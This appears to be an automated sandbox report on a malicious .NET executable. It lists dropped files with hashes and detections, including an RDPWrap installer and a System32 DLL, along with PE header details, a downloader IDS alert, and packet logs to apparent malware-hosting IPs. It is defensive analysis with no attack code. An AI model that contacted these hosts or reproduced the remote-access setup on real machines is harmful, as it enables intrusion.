                                                                              Preview:MDMP..a..... ..........g........................\)..........<....4......................`.......8...........T............k..(x..........05...........7..............................................................................eJ.......7......GenuineIntel............T...........u..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER93C2.tmp.WERInternalMetadata.xml

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):8402
                                                                              Entropy (8bit):3.6922068753529245
                                                                              Encrypted:false
                                                                              SSDEEP:192:R6l7wVeJlP6k+Y6YSISU9kdgmfZTuprH89bXUsf59m:R6lXJ96kR6YtSU9kdgmf9DXHfq
                                                                              MD5:2C0BCCD2941556161A66FF1C6E08DD58
                                                                              SHA1:3CC4BED02D8B5D8B207AACCBBEBA68523A1FD520
                                                                              SHA-256:96E2E52D23EC84EBAE80BD5A0CD406162130687899D9708708DAF7150FCCA945
                                                                              SHA-512:D63C69479B741FBC1E593B53665AE9B05AA897994942BCA0C78720C1D1C553C40766FD2E16A86A9BA9F65E52D0CD01524FCA695D51F7A9C13BBF7AC462B54C29
                                                                              Malicious:false
                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.4.4.4.<./.P.i.

                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER9597.tmp.xml

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4749
                                                                              Entropy (8bit):4.4710602476547665
                                                                              Encrypted:false
                                                                              SSDEEP:48:cvIwWl8zsmJg77aI9IbWpW8VYhYm8M4JTu3FTg+q8vhuT10/WiXd:uIjf8I7Sq7VZJxKu10/ZXd
                                                                              MD5:3E6317D8E4B0B87DB73DE3C52437BEFB
                                                                              SHA1:CE0B76533BBE3613DA1EA5383057CBEE40CE631B
                                                                              SHA-256:518EB8F48B09A51E15C54BD91B9F5AC53DC49292070EA9990CD29DBB13223D12
                                                                              SHA-512:CDDC2F7AEF96DC10F8B23EF76590A7FEB7598C7C098C1E77EE99F06617EA027B8864DEB2E2AB9C40BCDBAB9894C038BE45E89FE829241FBC3D107B742A1B066F
                                                                              Malicious:false
                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533786" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                              C:\Users\user\AppData\Local\Temp\RDPWInst.exe

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\hloRQZmlfg.exe
                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):1785344
                                                                              Entropy (8bit):6.646511331349125
                                                                              Encrypted:false
                                                                              SSDEEP:24576:+rKxoVT2iXc+IZP+6WiaTAsN/3ebTvK+63CWH8iA/iD2hgPjcC8SVdKumYr7:vHZGpdqYH8ia6GcKuR7
                                                                              MD5:C213162C86BB943BCDF91B3DF381D2F6
                                                                              SHA1:8EC200E2D836354A62F16CDB3EED4BB760165425
                                                                              SHA-256:AC91B2A2DB1909A2C166E243391846AD8D9EDE2C6FCFD33B60ACF599E48F9AFC
                                                                              SHA-512:B3EAD28BB1F4B87B0C36C129864A8AF34FC11E5E9FEAA047D4CA0525BEC379D07C8EFEE259EDE8832B65B3C03EF4396C9202989249199F7037D56439187F147B
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                              • Antivirus: Virustotal, Detection: 78%, Browse
                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...#.CZ.................4..........<7.......P....@..............................................@...................................`...{.......................^...................................................................................text... ........................... ..`.itext..|....0... .................. ..`.data...x....P.......8..............@....bss.....O...p.......L...................idata...............L..............@....tls.................`...................rdata...............`..............@..@.reloc...^.......`...b..............@..B.rsrc....{...`...|..................@..@.............p......................@..@................................................................................................

                                                                              C:\Windows\System32\rfxvmt.dll

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):37376
                                                                              Entropy (8bit):5.7181012847214445
                                                                              Encrypted:false
                                                                              SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                                              MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                                              SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                                              SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                                              SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

                                                                              C:\Windows\appcompat\Programs\Amcache.hve

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                              Category:dropped
                                                                              Size (bytes):1835008
                                                                              Entropy (8bit):4.372282454257978
                                                                              Encrypted:false
                                                                              SSDEEP:6144:rFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNPiL:RV1QyWWI/glMM6kF7Fq
                                                                              MD5:F1BCE4A5C7DE908DD5EA74859846AD43
                                                                              SHA1:4EA8D14E89BB9E1E37521B1316618D22CE93533B
                                                                              SHA-256:319A7DCBB18A1205BA5E5D3287D3D40D2D90CDF11C75CCD3E7B892BBC5C22A70
                                                                              SHA-512:8A9587AE4729AF386080FC24CEA6EA067CDD3505E77413A3F720D62CE959201250A1DE46375E2BFC302C96CF40FBBC4BCA7C6A8AF8FC9FCDC6F76F5DBBC696BC
                                                                              Malicious:false
                                                                              Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.... ...............................................................................................................................................................................................................................................................................................................................................\...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              \Device\ConDrv

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\netsh.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):7
                                                                              Entropy (8bit):2.2359263506290326
                                                                              Encrypted:false
                                                                              SSDEEP:3:t:t
                                                                              MD5:F1CA165C0DA831C9A17D08C4DECBD114
                                                                              SHA1:D750F8260312A40968458169B496C40DACC751CA
                                                                              SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                                                                              SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                                                                              Malicious:false
                                                                              Preview:Ok.....

                                                                              \Device\Mup\226546*\MAILSLOT\NET\NETLOGON

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\hloRQZmlfg.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):3.5957680897627275
                                                                              Encrypted:false
                                                                              SSDEEP:3:9alp/lj5I2Y1AnysjX8lLn:opoGWLn
                                                                              MD5:938C00D0FDB2EDAA0B021147CADE0D31
                                                                              SHA1:EC80E5D071694E592A3A60A2EAED203C131B226E
                                                                              SHA-256:45BC0D458DCDA1394EF04E4AEC88737F8B7E09675706523439FC847C3EA98985
                                                                              SHA-512:B010C80F20CBA02626A1EB085F92423B068681016A949D1EAC2B8AFA970C45FBC719948B63420E61D2F3BB3A0EA85DAADED8ED6F543EE22D534D701C075A5763
                                                                              Malicious:false
                                                                              Preview:....2.2.6.5.4.6.....\MAILSLOT\NET\GETDC72E98D64.................

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):7.596283104365083
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:hloRQZmlfg.exe
                                                                              File size:76'800 bytes
                                                                              MD5:cee4e023e6afaaa51f600caec3469215
                                                                              SHA1:bf2ceff1f19f09a70863d1f8c7be0fa9662b3b04
                                                                              SHA256:da52143dd6a13c1ea3e24e735f64938830e2a3160ae08989629a43e5020d1173
                                                                              SHA512:186f7a7592e2c21a83afe68bf0d57a3ad598ff5f3a74b626b45d4d555d9af52b66d0cba74445a55f89771f3078b47e18ae30feb6038934a433d99d85250a7ace
                                                                              SSDEEP:1536:Vkucxe3ckl/Q2slz7jHGZI7rBrWMwgN3R29suranxH2ufS/lXqfEbO3O6kiz:Vkucx0I26z/8uz22gaxH2z1qciO6Jz
                                                                              TLSH:AD73F12032A98019E67B607DA950A7486977D6AF6705DF1978CC1B3FCFA36C0C2532F6
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+............."...0..............0... ...@....@.. ....................................`................................

                                                                              File Icon

                                                                              Icon Hash:00928e8e8686b000

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x4130be
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x84BB012B [Wed Jul 25 16:54:03 2040 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x130640x57.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x1417.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x160000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x20000x110c40x112008d6c12afb3160a216b609a663f674244False0.8936045848540146data7.703627501061181IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x140000x14170x160008623ea232cafcfcefed1b0e7d59e098False0.37340198863636365data5.288273886180103IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x160000xc0x200323b94de8d126aeab9521a81e540fc48False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_VERSION0x140a00x254data0.45805369127516776
                                                                              RT_MANIFEST0x142f40x1123XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.4043765671301573

                                                                              Imports

                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-10-08T03:23:43.830864+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849710104.26.12.20580TCP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 8, 2024 03:23:03.951134920 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:03.955995083 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:03.956073046 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:03.960208893 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:03.965126991 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.578062057 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.578075886 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.578092098 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.578128099 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.578176975 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.578186989 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.578203917 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.578234911 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.578258038 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.578269958 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.578270912 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.578289032 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.578303099 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.578325987 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.578366041 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.583029985 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.583041906 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.583058119 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.583098888 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.627655983 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.666476965 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.666493893 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.666526079 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.666537046 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.666546106 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.666608095 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.666706085 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.666743040 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.666765928 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.666779995 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.666793108 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.666805983 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.666848898 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.667645931 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.667656898 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.667681932 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.667692900 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.667714119 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.667714119 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.667753935 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.668484926 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.668495893 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.668514967 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.668535948 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.668549061 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.668562889 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.668605089 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.669236898 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.669289112 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.669298887 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.669313908 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.669354916 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.669380903 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.721445084 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.758914948 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.758949995 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.758959055 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.758996964 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.759011030 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.759025097 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.759105921 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.759110928 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.759119034 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.759140015 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.759182930 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.759833097 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.759843111 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.759867907 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.759887934 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.759897947 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.759915113 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.759915113 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.759967089 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.760005951 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.760385990 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.760415077 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.760426044 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.760457039 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.760548115 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.760694981 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.760725975 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.760740042 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.760766029 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.760781050 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.760792971 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.760831118 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.761208057 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.761253119 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.761260986 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.761272907 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.761297941 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.761344910 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.761367083 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.761378050 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.761394978 CEST8049706147.45.44.104192.168.2.8
                                                                              Oct 8, 2024 03:23:04.761409998 CEST4970680192.168.2.8147.45.44.104
                                                                              Oct 8, 2024 03:23:04.761440992 CEST4970680192.168.2.8147.45.44.104
